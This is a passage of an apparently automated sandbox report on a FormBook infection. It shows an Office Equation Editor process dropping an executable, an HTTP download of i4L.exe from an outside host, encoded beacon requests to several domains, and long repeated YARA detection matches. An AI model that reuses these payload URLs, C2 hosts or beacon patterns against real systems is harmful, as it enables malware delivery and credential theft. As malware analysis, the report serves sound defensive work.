Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htm
Source: unknown, DNS traffic detected: queries for: mikeloayza.com
Source: global traffic, HTTP traffic detected:
  GET /E9/i4L.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Connection: Keep-Alive
  Host: mikeloayza.com
Source: global traffic, HTTP traffic detected:
  GET /E9/i4L.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: mikeloayza.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1
  Host: www.fisioletsgo.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1
  Host: www.bitcointradel.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1
  Host: www.executive-air.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1
  Host: www.luckyfandom.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: unknown, HTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\Pcportk28.exe
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00356226
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00354368
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00356C00
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00356479
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00356720
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00354968
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00358990
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00358980
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_009E11AB
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041C001
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00401030
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041B8C3
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041C948
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00408C80
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041BD22
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00402D8A
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00402D90
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00402FB0
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085E0C6
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0088D005
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00863040
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0087905A
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008DD06D
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085E2E9
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00901238
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_009063BF
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085F3CF
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008863DB
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00862305
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00867353
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008AA37B
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00895485
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00871489
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E443E
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0089D47D
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E05E3
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0087C5F0
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0086351F
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008A6540
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00864680
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0086E6C1
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00902622
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008AA634
